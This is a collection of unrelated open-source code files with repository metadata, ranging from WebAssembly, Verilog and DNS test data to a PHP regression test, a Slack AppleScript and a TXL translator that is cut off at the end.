FROM larskanis/rake-compiler-dock-mri-x86_64-darwin:1.1.0
Dockerfile
1
goodarzysepideh/grpc
third_party/rake-compiler-dock/rake_x86_64-darwin/Dockerfile
[ "Apache-2.0" ]
example.org. IN SOA ns.example.org. hostmaster.example.org. 200154054 28800 7200 604800 3600 example.org. IN NS ns.example.org. www.example.org. IN A 127.0.0.1 ns.example.org. IN A 127.0.0.1
DNS Zone
2
ndptech/unbound
testdata/zonemd.example1.zone
[ "BSD-3-Clause" ]
(module (type $none_=>_none (func)) (type $i32_=>_none (func (param i32))) (type $i32_=>_i32 (func (param i32) (result i32))) (type $i32_i32_i32_=>_none (func (param i32 i32 i32))) (type $i32_i32_=>_i32 (func (param i32 i32) (result i32))) (memory $0 0) (global $~lib/rt/stub/startOffset (mut i32) (i32.const 0)) (global $~lib/rt/stub/offset (mut i32) (i32.const 0)) (export "heap.alloc" (func $~lib/memory/heap.alloc)) (export "heap.realloc" (func $~lib/memory/heap.realloc)) (export "heap.free" (func $~lib/memory/heap.free)) (export "heap.reset" (func $~lib/memory/heap.reset)) (export "memory" (memory $0)) (start $~start) (func $~lib/rt/stub/maybeGrowMemory (param $0 i32) (local $1 i32) (local $2 i32) local.get $0 memory.size local.tee $2 i32.const 16 i32.shl i32.const 15 i32.add i32.const -16 i32.and local.tee $1 i32.gt_u if local.get $2 local.get $0 local.get $1 i32.sub i32.const 65535 i32.add i32.const -65536 i32.and i32.const 16 i32.shr_u local.tee $1 local.get $1 local.get $2 i32.lt_s select memory.grow i32.const 0 i32.lt_s if local.get $1 memory.grow i32.const 0 i32.lt_s if unreachable end end end local.get $0 global.set $~lib/rt/stub/offset ) (func $~lib/rt/stub/__alloc (param $0 i32) (result i32) (local $1 i32) (local $2 i32) local.get $0 i32.const 1073741820 i32.gt_u if unreachable end global.get $~lib/rt/stub/offset global.get $~lib/rt/stub/offset i32.const 4 i32.add local.tee $2 local.get $0 i32.const 19 i32.add i32.const -16 i32.and i32.const 4 i32.sub local.tee $0 i32.add call $~lib/rt/stub/maybeGrowMemory local.get $0 i32.store local.get $2 ) (func $~lib/memory/heap.alloc (param $0 i32) (result i32) local.get $0 call $~lib/rt/stub/__alloc ) (func $~lib/memory/memory.copy (param $0 i32) (param $1 i32) (param $2 i32) (local $3 i32) (local $4 i32) block $~lib/util/memory/memmove|inlined.0 local.get $2 local.set $4 local.get $0 local.get $1 i32.eq br_if $~lib/util/memory/memmove|inlined.0 local.get $0 local.get $1 i32.lt_u if local.get $1 i32.const 7 i32.and local.get $0 i32.const 7 i32.and i32.eq if loop $while-continue|0 local.get $0 i32.const 7 i32.and if local.get $4 i32.eqz br_if $~lib/util/memory/memmove|inlined.0 local.get $4 i32.const 1 i32.sub local.set $4 local.get $0 local.tee $2 i32.const 1 i32.add local.set $0 local.get $1 local.tee $3 i32.const 1 i32.add local.set $1 local.get $2 local.get $3 i32.load8_u i32.store8 br $while-continue|0 end end loop $while-continue|1 local.get $4 i32.const 8 i32.ge_u if local.get $0 local.get $1 i64.load i64.store local.get $4 i32.const 8 i32.sub local.set $4 local.get $0 i32.const 8 i32.add local.set $0 local.get $1 i32.const 8 i32.add local.set $1 br $while-continue|1 end end end loop $while-continue|2 local.get $4 if local.get $0 local.tee $2 i32.const 1 i32.add local.set $0 local.get $1 local.tee $3 i32.const 1 i32.add local.set $1 local.get $2 local.get $3 i32.load8_u i32.store8 local.get $4 i32.const 1 i32.sub local.set $4 br $while-continue|2 end end else local.get $1 i32.const 7 i32.and local.get $0 i32.const 7 i32.and i32.eq if loop $while-continue|3 local.get $0 local.get $4 i32.add i32.const 7 i32.and if local.get $4 i32.eqz br_if $~lib/util/memory/memmove|inlined.0 local.get $4 i32.const 1 i32.sub local.tee $4 local.get $0 i32.add local.get $1 local.get $4 i32.add i32.load8_u i32.store8 br $while-continue|3 end end loop $while-continue|4 local.get $4 i32.const 8 i32.ge_u if local.get $4 i32.const 8 i32.sub local.tee $4 local.get $0 i32.add local.get $1 local.get $4 i32.add i64.load i64.store br $while-continue|4 end end end loop $while-continue|5 local.get $4 if local.get $4 i32.const 1 i32.sub local.tee $4 local.get $0 i32.add local.get $1 local.get $4 i32.add i32.load8_u i32.store8 br $while-continue|5 end end end end ) (func $~lib/memory/heap.realloc (param $0 i32) (param $1 i32) (result i32) (local $2 i32) (local $3 i32) (local $4 i32) (local $5 i32) global.get $~lib/rt/stub/offset local.get $0 local.get $0 i32.const 4 i32.sub local.tee $4 i32.load local.tee $3 i32.add i32.eq local.set $5 local.get $1 i32.const 19 i32.add i32.const -16 i32.and i32.const 4 i32.sub local.set $2 local.get $1 local.get $3 i32.gt_u if local.get $5 if local.get $1 i32.const 1073741820 i32.gt_u if unreachable end local.get $0 local.get $2 i32.add call $~lib/rt/stub/maybeGrowMemory local.get $4 local.get $2 i32.store else local.get $2 local.get $3 i32.const 1 i32.shl local.tee $1 local.get $1 local.get $2 i32.lt_u select call $~lib/rt/stub/__alloc local.tee $1 local.get $0 local.get $3 call $~lib/memory/memory.copy local.get $1 local.set $0 end else local.get $5 if local.get $0 local.get $2 i32.add global.set $~lib/rt/stub/offset local.get $4 local.get $2 i32.store end end local.get $0 ) (func $~lib/memory/heap.free (param $0 i32) global.get $~lib/rt/stub/offset local.get $0 local.get $0 i32.const 4 i32.sub local.tee $0 i32.load i32.add i32.eq if local.get $0 global.set $~lib/rt/stub/offset end ) (func $~lib/memory/heap.reset global.get $~lib/rt/stub/startOffset global.set $~lib/rt/stub/offset ) (func $~start i32.const 1036 global.set $~lib/rt/stub/startOffset i32.const 1036 global.set $~lib/rt/stub/offset ) )
WebAssembly
3
romdotdog/assemblyscript
tests/allocators/stub/optimized.wat
[ "Apache-2.0" ]
// (c) Copyright 1995-2018 Xilinx, Inc. All rights reserved. // // This file contains confidential and proprietary information // of Xilinx, Inc. and is protected under U.S. and // international copyright and other intellectual property // laws. // // DISCLAIMER // This disclaimer is not a license and does not grant any // rights to the materials distributed herewith. Except as // otherwise provided in a valid license issued to you by // Xilinx, and to the maximum extent permitted by applicable // law: (1) THESE MATERIALS ARE MADE AVAILABLE "AS IS" AND // WITH ALL FAULTS, AND XILINX HEREBY DISCLAIMS ALL WARRANTIES // AND CONDITIONS, EXPRESS, IMPLIED, OR STATUTORY, INCLUDING // BUT NOT LIMITED TO WARRANTIES OF MERCHANTABILITY, NON- // INFRINGEMENT, OR FITNESS FOR ANY PARTICULAR PURPOSE; and // (2) Xilinx shall not be liable (whether in contract or tort, // including negligence, or under any other theory of // liability) for any loss or damage of any kind or nature // related to, arising under or in connection with these // materials, including for any direct, or any indirect, // special, incidental, or consequential loss or damage // (including loss of data, profits, goodwill, or any type of // loss or damage suffered as a result of any action brought // by a third party) even if such damage or loss was // reasonably foreseeable or Xilinx had been advised of the // possibility of the same. // // CRITICAL APPLICATIONS // Xilinx products are not designed or intended to be fail- // safe, or for use in any application requiring fail-safe // performance, such as life-support or safety devices or // systems, Class III medical devices, nuclear facilities, // applications related to the deployment of airbags, or any // other applications that could lead to death, personal // injury, or severe property or environmental damage // (individually and collectively, "Critical // Applications"). Customer assumes the sole risk and // liability of any use of Xilinx products in Critical // Applications, subject only to applicable laws and // regulations governing limitations on product liability. // // THIS COPYRIGHT NOTICE AND DISCLAIMER MUST BE RETAINED AS // PART OF THIS FILE AT ALL TIMES. // // DO NOT MODIFY THIS FILE. // IP VLNV: xilinx.com:hls:spmv_mult_axis:1.0 // IP Revision: 1807032102 // The following must be inserted into your Verilog file for this // core to be instantiated. Change the instance name and port connections // (in parentheses) to your own signal names. //----------- Begin Cut here for INSTANTIATION Template ---// INST_TAG spmv_mult_axis_0 your_instance_name ( .output_size_loopback_ap_vld(output_size_loopback_ap_vld), // output wire output_size_loopback_ap_vld .s_axi_AXILiteS_AWADDR(s_axi_AXILiteS_AWADDR), // input wire [5 : 0] s_axi_AXILiteS_AWADDR .s_axi_AXILiteS_AWVALID(s_axi_AXILiteS_AWVALID), // input wire s_axi_AXILiteS_AWVALID .s_axi_AXILiteS_AWREADY(s_axi_AXILiteS_AWREADY), // output wire s_axi_AXILiteS_AWREADY .s_axi_AXILiteS_WDATA(s_axi_AXILiteS_WDATA), // input wire [31 : 0] s_axi_AXILiteS_WDATA .s_axi_AXILiteS_WSTRB(s_axi_AXILiteS_WSTRB), // input wire [3 : 0] s_axi_AXILiteS_WSTRB .s_axi_AXILiteS_WVALID(s_axi_AXILiteS_WVALID), // input wire s_axi_AXILiteS_WVALID .s_axi_AXILiteS_WREADY(s_axi_AXILiteS_WREADY), // output wire s_axi_AXILiteS_WREADY .s_axi_AXILiteS_BRESP(s_axi_AXILiteS_BRESP), // output wire [1 : 0] s_axi_AXILiteS_BRESP .s_axi_AXILiteS_BVALID(s_axi_AXILiteS_BVALID), // output wire s_axi_AXILiteS_BVALID .s_axi_AXILiteS_BREADY(s_axi_AXILiteS_BREADY), // input wire s_axi_AXILiteS_BREADY .s_axi_AXILiteS_ARADDR(s_axi_AXILiteS_ARADDR), // input wire [5 : 0] s_axi_AXILiteS_ARADDR .s_axi_AXILiteS_ARVALID(s_axi_AXILiteS_ARVALID), // input wire s_axi_AXILiteS_ARVALID .s_axi_AXILiteS_ARREADY(s_axi_AXILiteS_ARREADY), // output wire s_axi_AXILiteS_ARREADY .s_axi_AXILiteS_RDATA(s_axi_AXILiteS_RDATA), // output wire [31 : 0] s_axi_AXILiteS_RDATA .s_axi_AXILiteS_RRESP(s_axi_AXILiteS_RRESP), // output wire [1 : 0] s_axi_AXILiteS_RRESP .s_axi_AXILiteS_RVALID(s_axi_AXILiteS_RVALID), // output wire s_axi_AXILiteS_RVALID .s_axi_AXILiteS_RREADY(s_axi_AXILiteS_RREADY), // input wire s_axi_AXILiteS_RREADY .ap_clk(ap_clk), // input wire ap_clk .ap_rst_n(ap_rst_n), // input wire ap_rst_n .interrupt(interrupt), // output wire interrupt .m_axi_vect_AWADDR(m_axi_vect_AWADDR), // output wire [31 : 0] m_axi_vect_AWADDR .m_axi_vect_AWLEN(m_axi_vect_AWLEN), // output wire [7 : 0] m_axi_vect_AWLEN .m_axi_vect_AWSIZE(m_axi_vect_AWSIZE), // output wire [2 : 0] m_axi_vect_AWSIZE .m_axi_vect_AWBURST(m_axi_vect_AWBURST), // output wire [1 : 0] m_axi_vect_AWBURST .m_axi_vect_AWLOCK(m_axi_vect_AWLOCK), // output wire [1 : 0] m_axi_vect_AWLOCK .m_axi_vect_AWREGION(m_axi_vect_AWREGION), // output wire [3 : 0] m_axi_vect_AWREGION .m_axi_vect_AWCACHE(m_axi_vect_AWCACHE), // output wire [3 : 0] m_axi_vect_AWCACHE .m_axi_vect_AWPROT(m_axi_vect_AWPROT), // output wire [2 : 0] m_axi_vect_AWPROT .m_axi_vect_AWQOS(m_axi_vect_AWQOS), // output wire [3 : 0] m_axi_vect_AWQOS .m_axi_vect_AWVALID(m_axi_vect_AWVALID), // output wire m_axi_vect_AWVALID .m_axi_vect_AWREADY(m_axi_vect_AWREADY), // input wire m_axi_vect_AWREADY .m_axi_vect_WDATA(m_axi_vect_WDATA), // output wire [31 : 0] m_axi_vect_WDATA .m_axi_vect_WSTRB(m_axi_vect_WSTRB), // output wire [3 : 0] m_axi_vect_WSTRB .m_axi_vect_WLAST(m_axi_vect_WLAST), // output wire m_axi_vect_WLAST .m_axi_vect_WVALID(m_axi_vect_WVALID), // output wire m_axi_vect_WVALID .m_axi_vect_WREADY(m_axi_vect_WREADY), // input wire m_axi_vect_WREADY .m_axi_vect_BRESP(m_axi_vect_BRESP), // input wire [1 : 0] m_axi_vect_BRESP .m_axi_vect_BVALID(m_axi_vect_BVALID), // input wire m_axi_vect_BVALID .m_axi_vect_BREADY(m_axi_vect_BREADY), // output wire m_axi_vect_BREADY .m_axi_vect_ARADDR(m_axi_vect_ARADDR), // output wire [31 : 0] m_axi_vect_ARADDR .m_axi_vect_ARLEN(m_axi_vect_ARLEN), // output wire [7 : 0] m_axi_vect_ARLEN .m_axi_vect_ARSIZE(m_axi_vect_ARSIZE), // output wire [2 : 0] m_axi_vect_ARSIZE .m_axi_vect_ARBURST(m_axi_vect_ARBURST), // output wire [1 : 0] m_axi_vect_ARBURST .m_axi_vect_ARLOCK(m_axi_vect_ARLOCK), // output wire [1 : 0] m_axi_vect_ARLOCK .m_axi_vect_ARREGION(m_axi_vect_ARREGION), // output wire [3 : 0] m_axi_vect_ARREGION .m_axi_vect_ARCACHE(m_axi_vect_ARCACHE), // output wire [3 : 0] m_axi_vect_ARCACHE .m_axi_vect_ARPROT(m_axi_vect_ARPROT), // output wire [2 : 0] m_axi_vect_ARPROT .m_axi_vect_ARQOS(m_axi_vect_ARQOS), // output wire [3 : 0] m_axi_vect_ARQOS .m_axi_vect_ARVALID(m_axi_vect_ARVALID), // output wire m_axi_vect_ARVALID .m_axi_vect_ARREADY(m_axi_vect_ARREADY), // input wire m_axi_vect_ARREADY .m_axi_vect_RDATA(m_axi_vect_RDATA), // input wire [31 : 0] m_axi_vect_RDATA .m_axi_vect_RRESP(m_axi_vect_RRESP), // input wire [1 : 0] m_axi_vect_RRESP .m_axi_vect_RLAST(m_axi_vect_RLAST), // input wire m_axi_vect_RLAST .m_axi_vect_RVALID(m_axi_vect_RVALID), // input wire m_axi_vect_RVALID .m_axi_vect_RREADY(m_axi_vect_RREADY), // output wire m_axi_vect_RREADY .val_col_ind_stream_TVALID(val_col_ind_stream_TVALID), // input wire val_col_ind_stream_TVALID .val_col_ind_stream_TREADY(val_col_ind_stream_TREADY), // output wire val_col_ind_stream_TREADY .val_col_ind_stream_TDATA(val_col_ind_stream_TDATA), // input wire [63 : 0] val_col_ind_stream_TDATA .val_col_ind_stream_TKEEP(val_col_ind_stream_TKEEP), // input wire [3 : 0] val_col_ind_stream_TKEEP .val_col_ind_stream_TLAST(val_col_ind_stream_TLAST), // input wire [0 : 0] val_col_ind_stream_TLAST .rowptr_stream_TVALID(rowptr_stream_TVALID), // input wire rowptr_stream_TVALID .rowptr_stream_TREADY(rowptr_stream_TREADY), // output wire rowptr_stream_TREADY .rowptr_stream_TDATA(rowptr_stream_TDATA), // input wire [31 : 0] rowptr_stream_TDATA .rowptr_stream_TKEEP(rowptr_stream_TKEEP), // input wire [3 : 0] rowptr_stream_TKEEP .rowptr_stream_TLAST(rowptr_stream_TLAST), // input wire [0 : 0] rowptr_stream_TLAST .output_stream_V_TVALID(output_stream_V_TVALID), // output wire output_stream_V_TVALID .output_stream_V_TREADY(output_stream_V_TREADY), // input wire output_stream_V_TREADY .output_stream_V_TDATA(output_stream_V_TDATA), // output wire [31 : 0] output_stream_V_TDATA .row_size_stream_V_TVALID(row_size_stream_V_TVALID), // output wire row_size_stream_V_TVALID .row_size_stream_V_TREADY(row_size_stream_V_TREADY), // input wire row_size_stream_V_TREADY .row_size_stream_V_TDATA(row_size_stream_V_TDATA), // output wire [31 : 0] row_size_stream_V_TDATA .output_size_loopback(output_size_loopback) // output wire [31 : 0] output_size_loopback ); // INST_TAG_END ------ End INSTANTIATION Template --------- // You must compile the wrapper file spmv_mult_axis_0.v when simulating // the core, spmv_mult_axis_0. When compiling the wrapper file, be sure to // reference the Verilog simulation library.
Verilog
3
m-asiatici/MSHR-rich
spmv/TopLevel/TopLevel.srcs/sources_1/ip/spmv_mult_axis_0_1/spmv_mult_axis_0.veo
[ "MIT" ]
<header class="<$mt:Var name='header_class'$>"> <div class="inner clearfix"> <mt:SetVarBlock name="site-logo"><mt:Assets tag="@SITE_LOGO" limit="1"><mt:AssetUrl></mt:Assets></mt:SetVarBlock> <h1><a href="<$mt:BlogURL encode_html="1"$>"><mt:If name="site-logo"><mt:Assets type="image" tag="@SITE_LOGO" limit="1"><img src="<mt:asseturl>" alt="<mt:blogname>"></mt:Assets><mt:Else><img src="<$mt:BlogURL encode_html="1"$>images/logo.png" alt="<$mt:BlogName encode_html="1"$>" /></mt:If></a></h1> <span id="responsive-menu-button"></span> <mt:If name="header_class" eq="top-header"> <h2><$mt:BlogDescription$></h2> </mt:If> <nav role="navigation" id="globalnavi"> <div id="navi-content"> <ul> <mt:TopLevelCategories> <mt:If tag="CategoryCount"> <li><a href="<$mt:CategoryArchiveLink$>"><$mt:CategoryLabel encode_html="1"$></a> <mt:Else> </mt:If> </mt:TopLevelCategories> <mt:Pages sort_order="ascend"><li><a href="<$mt:PagePermalink$>"><$mt:PageTitle$></a></li></mt:Pages> </ul> </div> </nav> </div> </header>
MTML
3
kanpapa/mt-theme-rimo
themes/rimo/templates/header.mtml
[ "MIT" ]
// run-pass fn bar(v: &mut [usize]) { v.reverse(); v.reverse(); v.reverse(); } pub fn main() { let mut the_vec = vec![1, 2, 3, 100]; bar(&mut the_vec); assert_eq!(the_vec, [100, 3, 2, 1]); }
Rust
4
Eric-Arellano/rust
src/test/ui/coercion/coerce-reborrow-mut-vec-rcvr.rs
[ "ECL-2.0", "Apache-2.0", "MIT-0", "MIT" ]
{ "@context": { "_": "http://example.com/this-prefix-would-overwrite-all-blank-node-identifiers" }, "@id": "_:node1", "@type": "_:type", "_:property": "all these IRIs remain unchanged because they are interpreted as blank node identifiers" }
JSONLD
2
fsteeg/json-ld-api
tests/toRdf/0108-in.jsonld
[ "W3C" ]
saml.keystore.location=classpath:/saml/samlKeystore.jks # Password for Java keystore and item therein saml.keystore.password=<key_pass> saml.keystore.alias=<key_alias> # SAML Entity ID extracted from top of SAML metadata file saml.idp=<idp_issuer_url> saml.sp=http://localhost:8080/saml/metadata
INI
1
DBatOWL/tutorials
spring-security-modules/spring-security-saml/src/main/resources/application.properties
[ "MIT" ]
#!/usr/bin/osascript # Required parameters: # @raycast.author Faris Aziz # @raycast.authorURL https://github.com/farisaziz12 # @raycast.schemaVersion 1 # @raycast.title Send Message in Channel # @raycast.mode silent # @raycast.packageName Slack # @raycast.description This script posts a message text to a slack channel and sets active status (defaults to random good morning message in #general) # @raycast.needsConfirmation true # @raycast.argument1 { "type": "text", "placeholder": "Channel (default: #general)", "optional": true, } # @raycast.argument2 { "type": "text", "placeholder": "Message (default: good morning)", "optional": true, } # @raycast.argument3 { "type": "text", "placeholder": "Set Active? y/n", "optional": true, } # Optional parameters: # @raycast.icon images/slack-logo.png on openChannel(channel) tell application "Slack" activate tell application "System Events" keystroke "k" using {command down} delay 0.5 keystroke channel delay 0.5 key code 36 delay 0.5 end tell end tell end openChannel on sendMessage(msg) tell application "Slack" activate tell application "System Events" keystroke msg delay 0.5 key code 36 end tell end tell end sendMessage on slashCommand(cmd) tell application "Slack" activate tell application "System Events" key code 44 delay 0.5 keystroke cmd delay 0.5 key code 36 end tell end tell end slashCommand on pressReturn() tell application "Slack" activate tell application "System Events" delay 1 key code 36 end tell end tell end pressReturn on run argv set channel to item 1 of argv set message to item 2 of argv set setActive to item 3 of argv set today to do shell script "date +%A" set todayText to "Happy " & today & "!" set goodMorningTexts to {"Good Morning all!", "Good Morning Everyone!", todayText } set randomItemNum to random number from 1 to count of goodMorningTexts set randomGoodMorningText to item randomItemNum of goodMorningTexts as string -- if no channel argument set #general as default if channel = "" then set channelToSendTo to "#general" else set channelToSendTo to channel end if -- if no message argument set random good morning message as default if message = "" then set messageToSend to randomGoodMorningText else set messageToSend to message end if openChannel(channelToSendTo) -- setting to active will not work if already active if setActive = "y" or setActive = "Y" then sendMessage(messageToSend) slashCommand("Set yourself as active") pressReturn() log messageToSend & " sent To " & channelToSendTo &" and status set to active!" else if setActive = "n" or setActive = "N" or setActive = "" -- default is no sendMessage(messageToSend) log messageToSend & " sent To " & channelToSendTo &"!" else log "Invalid argument for set active. Specify setting active using 'y' or 'n'" end if end run
AppleScript
5
daviddzhou/script-commands
commands/communication/slack/slack-send-message.applescript
[ "MIT" ]
--TEST-- Bug ##76452 (Crash while parsing blob data in firebird_fetch_blob) --SKIPIF-- <?php require('skipif.inc'); ?> --FILE-- <?php require_once "payload_server.inc"; $address = run_server(__DIR__ . "/bug_76452.data"); // no need to change the credentials; we're running against a falke server $dsn = "firebird:dbname=inet://$address/test"; $username = 'SYSDBA'; $password = 'masterkey'; $dbh = new PDO($dsn, $username, $password, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]); $query = $dbh->prepare("select * from test"); $query->execute(); var_dump($query->fetch()); ?> --EXPECT-- array(4) { ["AAA"]=> string(4) "hihi" [0]=> string(4) "hihi" ["BBBB"]=> NULL [1]=> NULL }
PHP
3
NathanFreeman/php-src
ext/pdo_firebird/tests/bug_76452.phpt
[ "PHP-3.01" ]
"""Tests for the Aussie Broadband integration."""
Python
0
MrDelik/core
tests/components/aussie_broadband/__init__.py
[ "Apache-2.0" ]
#pragma once #include <torch/data/dataloader.h> #include <torch/data/datasets.h> #include <torch/data/samplers.h> #include <torch/data/transforms.h> // Some "exports". namespace torch { namespace data { using datasets::BatchDataset; using datasets::Dataset; } // namespace data } // namespace torch
C
2
Hacky-DH/pytorch
torch/csrc/api/include/torch/data.h
[ "Intel" ]
<?Lassoscript // Last modified 8/31/09 by ECL, Landmann InterActive /* Tagdocs; {Tagname= OutputSecondContent } {Description= Outputs the already-built $SecondContent } {Author= Eric Landmann } {AuthorEmail= [email protected] } {ModifiedBy= } {ModifiedByEmail= } {Date= 3/18/08 } {Usage= OutputSecondContent (outputs without the container HTML) OutputSecondContent, -container='Y' (outputs with the container HTML) } {ExpectedResults= Outputs the HTML in $SecondContent } {Dependencies= $SecondContent must be defined, otherwise there will be no output } {DevelNotes= $SecondContent is created in detail.inc. This tag is merely a convenience to make it less awkward for a designer } {ChangeNotes= 8/31/09 Integrated into itPage codebase. } /Tagdocs; */ If: !(Lasso_TagExists:'OutputSecondContent'); Define_Tag:'OutputSecondContent', -Description='Outputs $SecondContent', -Optional='container', -Type='string'; Local('Result') = null; // Check if $SecondContent is defined If: (Var_Defined:'SecondContent'); #Result += '<!-- OutputSecondContent -->\n'; Local_Defined('initialvalue') ? #Result += '\t<div class="SecondContentPanel">\n'; #Result += $SecondContent; Local_Defined('initialvalue') ? #Result += '\t</div>\n'; Else; If: $svDebug == 'Y'; #Result += '<strong>OutputSecondContent: </strong>$SecondContent is undefined<br>\n'; /If; /If; Return: (Encode_Smart:(#Result)); /Define_Tag; Log_Critical: 'Custom Tag Loaded - OutputSecondContent'; /If; ?>
Lasso
4
subethaedit/SubEthaEd
Documentation/ModeDevelopment/Reference Files/LassoScript-HTML/itpage/LassoStartup/OutputSecondContent.lasso
[ "MIT" ]
<div class="row"> <div class="col-md-12"> <div class="card card-secondary"> <div class="card-header"> <h3 class="card-title">Welcome to WebTools</h3> </div> <div class="card-body"> This application allows you to use {{ link_to(phalcon_url, "Phalcon", false, "target": "_blank") -}}&nbsp; {{- link_to(devtools_url, "Developer Tools", false, "target": "_blank") }} using a web interface. </div> </div> </div> </div>
Volt
3
PSD-Company/phalcon-devtools-docker
src/Web/Tools/Views/index/index.volt
[ "BSD-3-Clause" ]
include "testcase.txl" keys 'boolean 'new end keys define java_statements [repeat java_lang_stmt] end define define java_lang_stmt [al_ragel_stmt] | [java_variable_decl] | [java_expr_stmt] | [java_if_stmt] | [EX] '{ [IN] [NL] [java_statements] [EX] '} [IN] [NL] end define define java_variable_decl [java_type_decl] [id] [opt union] '; [NL] end define define java_type_decl [al_type_decl] | 'boolean | 'String end define define java_expr_stmt [java_expr] '; [NL] end define define java_expr [java_term] [repeat java_expr_extend] end define define java_expr_extend [al_expr_op] [java_term] end define define java_term [al_term] | [id] [repeat java_dot_id] | [id] [repeat java_dot_id] '( [java_args] ') | 'new [java_type_decl] [union] | 'new [java_type_decl] '( [java_args] ') end define define java_dot_id '. [id] end define define java_args [list java_expr] end define define java_sign '- | '+ end define define java_if_stmt 'if '( [java_expr] ') [NL] [IN] [java_lang_stmt] [EX] [opt java_else] end define define java_else 'else [NL] [IN] [java_lang_stmt] [EX] end define define java_lang [java_statements] '%% [NL] [java_statements] [ragel_def] end define define program [lang_indep] | [java_lang] end define redefine al_host_block '{ [NL] [IN] [al_statements] [EX] '} [NL] | '{ [NL] [IN] [java_statements] [EX] '} [NL] end define redefine cond_action_stmt 'action [id] '{ [al_expr] '} [NL] | 'action [id] '{ [java_expr] '} [NL] end redefine function clearUnion Type [java_type_decl] Id [id] replace [opt union] Union [union] import ArrayInits [java_statements] Stmts [repeat java_lang_stmt] export ArrayInits Id '= 'new Type Union '; Stmts by '[] end function rule boolTypes replace [java_type_decl] 'bool by 'boolean end rule rule ptrTypes replace [al_type_decl] 'ptr by 'int end rule function alStmtToJava1 AlStmt [action_lang_stmt] deconstruct AlStmt VarDecl [al_variable_decl] deconstruct VarDecl Type [al_type_decl] Id [id] OptUnion [opt union] '; construct JavaType [java_type_decl] Type construct Result [java_variable_decl] JavaType [boolTypes] [ptrTypes] Id OptUnion [clearUnion JavaType Id] '; replace [repeat java_lang_stmt] by Result end function rule alTermToJava1 replace [al_term] 'first_token_char by 'data '[ts] end rule rule alTermToJava2 replace [al_term] '< _ [al_type_decl] '> '( AlExpr [al_expr] ') by '( AlExpr ') end rule function alTermToJava replace [al_term] AlTerm [al_term] by AlTerm [alTermToJava1] [alTermToJava2] end function function alExprExtendToJava AlExprExtend [repeat al_expr_extend] deconstruct AlExprExtend Op [al_expr_op] Term [al_term] Rest [repeat al_expr_extend] construct JavaRest [repeat java_expr_extend] _ [alExprExtendToJava Rest] replace [repeat java_expr_extend] by Op Term [alTermToJava] JavaRest end function function alExprToJava AlExpr [al_expr] deconstruct AlExpr ALTerm [al_term] AlExprExtend [repeat al_expr_extend] construct JavaExprExtend [repeat java_expr_extend] _ [alExprExtendToJava AlExprExtend] construct Result [opt java_expr] ALTerm [alTermToJava] JavaExprExtend replace [opt java_expr] by Result end function function alStmtToJava2 AlStmt [action_lang_stmt] deconstruct AlStmt AlExpr [al_expr] '; construct OptJavaExpr [opt java_expr] _ [alExprToJava AlExpr] deconstruct OptJavaExpr JavaExpr [java_expr] replace [repeat java_lang_stmt] by JavaExpr '; end function function alOptElseJava AlOptElse [opt al_else] deconstruct AlOptElse 'else AlSubStmt [action_lang_stmt] construct AlSubStmts [repeat action_lang_stmt] AlSubStmt construct JavaSubStmts [repeat java_lang_stmt] _ [alToJava AlSubStmts] deconstruct JavaSubStmts JavaSubStmt [java_lang_stmt] replace [opt java_else] by 'else JavaSubStmt end function function alStmtToJava3 AlStmt [action_lang_stmt] deconstruct AlStmt 'if '( AlExpr [al_expr] ') AlSubStmt [action_lang_stmt] AlOptElse [opt al_else] construct OptJavaExpr [opt java_expr] _ [alExprToJava AlExpr] deconstruct OptJavaExpr JavaExpr [java_expr] construct AlSubStmts [repeat action_lang_stmt] AlSubStmt construct JavaSubStmts [repeat java_lang_stmt] _ [alToJava AlSubStmts] deconstruct JavaSubStmts JavaSubStmt [java_lang_stmt] construct OptJavaElse [opt java_else] _ [alOptElseJava AlOptElse] replace [repeat java_lang_stmt] by 'if '( JavaExpr ') JavaSubStmt OptJavaElse end function function alStmtToJava4a AlStmt [action_lang_stmt] deconstruct AlStmt 'printi Id [id] '; replace [repeat java_lang_stmt] by 'System '. 'out '. 'print '( Id '); end function function alStmtToJava4b AlStmt [action_lang_stmt] deconstruct AlStmt 'prints String [stringlit] '; replace [repeat java_lang_stmt] by 'System '. 'out '. 'print '( String '); end function function alStmtToJava4c AlStmt [action_lang_stmt] deconstruct AlStmt 'printb Id [id] '; replace [repeat java_lang_stmt] by '_s '= 'new 'String '( Id ', '0 ', 'pos ') '; 'System '. 'out '. 'print '( '_s '); end function function alStmtToJava4d AlStmt [action_lang_stmt] deconstruct AlStmt 'print_token '; replace [repeat java_lang_stmt] by '_s '= 'new 'String '( 'data ', 'ts ', 'te '- 'ts ') '; 'System '. 'out '. 'print '( '_s '); end function function alStmtToJava5 AlStmt [action_lang_stmt] deconstruct AlStmt '{ AlSubStmts [repeat action_lang_stmt] '} construct JavaSubStmts [repeat java_lang_stmt] _ [alToJava AlSubStmts] replace [repeat java_lang_stmt] by '{ JavaSubStmts '} end function function alStmtToJava6 AlStmt [action_lang_stmt] deconstruct AlStmt RagelStmt [al_ragel_stmt] replace [repeat java_lang_stmt] by RagelStmt end function function alToJava AlStmts [repeat action_lang_stmt] deconstruct AlStmts FirstStmt [action_lang_stmt] Rest [repeat action_lang_stmt] construct JavaFirst [repeat java_lang_stmt] _ [alStmtToJava1 FirstStmt] [alStmtToJava2 FirstStmt] [alStmtToJava3 FirstStmt] [alStmtToJava4a FirstStmt] [alStmtToJava4b FirstStmt] [alStmtToJava4c FirstStmt] [alStmtToJava4d FirstStmt] [alStmtToJava5 FirstStmt] [alStmtToJava6 FirstStmt] construct JavaRest [repeat java_lang_stmt] _ [alToJava Rest] replace [repeat java_lang_stmt] by JavaFirst [. JavaRest] end function rule actionTransJava replace [al_host_block] '{ AlStmts [repeat action_lang_stmt] '} construct JavaStmts [repeat java_lang_stmt] _ [alToJava AlStmts] by '{ JavaStmts '} end rule rule condTransJava replace [cond_action_stmt] 'action Id [id] '{ AlExpr [al_expr] '} construct OptJavaExpr [opt java_expr] _ [alExprToJava AlExpr] deconstruct OptJavaExpr JavaExpr [java_expr] by 'action Id '{ JavaExpr '} end rule rule machineName replace $ [machine_stmt] 'machine _ [id] '; import TXLargs [repeat stringlit] Arg1 [stringlit] _ [repeat stringlit] construct ClassName [id] _ [unquote Arg1] by 'machine ClassName '; end rule function langTransJava replace [program] Definitions [repeat action_lang_stmt] '%% Initializations [repeat action_lang_stmt] RagelDef [ragel_def] construct JavaDefinitions [repeat java_lang_stmt] _ [alToJava Definitions] construct JavaInitializations [repeat java_lang_stmt] _ [alToJava Initializations] construct NewRagelDef [ragel_def] RagelDef [actionTransJava] [condTransJava] [machineName] import ArrayInits [java_statements] ArrayInitStmts [repeat java_lang_stmt] by 